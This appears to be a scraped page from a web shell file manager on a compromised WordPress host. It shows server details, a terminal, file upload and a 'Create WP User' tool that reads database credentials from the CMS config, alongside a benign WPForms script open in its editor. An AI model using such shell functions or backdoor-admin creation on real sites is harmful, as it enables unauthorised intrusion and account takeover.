Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat_30102025
/
wp-content
/
plugins
/
wpforms-lite
/
assets
/
js
/
integrations
/
woocommerce
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
notifications.js
1.35 KB
-rw-r--r--
2025-04-10 14:57
notifications.min.js
581.00 B
-rw-r--r--
2025-04-10 14:57
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
notifications.js
/* global wpforms_woocommerce_notifications */ /** * WooCommerce Notifications integration script. * * @since 1.8.9 */ const WPFormsWoocommerceNotifications = window.WPFormsWoocommerceNotifications || ( function( document, window, $ ) { /** * Public functions and properties. * * @since 1.8.9 */ const app = { /** * Start the engine. * * @since 1.8.9 */ init() { $( app.ready ); }, /** * Document ready. * * @since 1.8.9 */ ready() { app.events(); }, /** * Events. * * @since 1.8.9 */ events() { $( '#wpforms-woocommerce-close' ).on( 'click', app.dismiss ); }, /** * Hide notification. * * @since 1.8.9 */ dismiss() { const $btn = $( this ); const $notification = $btn.closest( '.wpforms-woocommerce-notification' ); $notification.remove(); const data = { action: 'wpforms_woocommerce_dismiss', nonce: wpforms_woocommerce_notifications.nonce, }; $.post( wpforms_woocommerce_notifications.ajax_url, data, function( res ) { if ( ! res.success ) { // eslint-disable-next-line no-console console.log( res ); } } ).fail( function( xhr ) { // eslint-disable-next-line no-console console.log( xhr.responseText ); } ); }, }; return app; }( document, window, jQuery ) ); // Initialize. WPFormsWoocommerceNotifications.init();
关闭
保存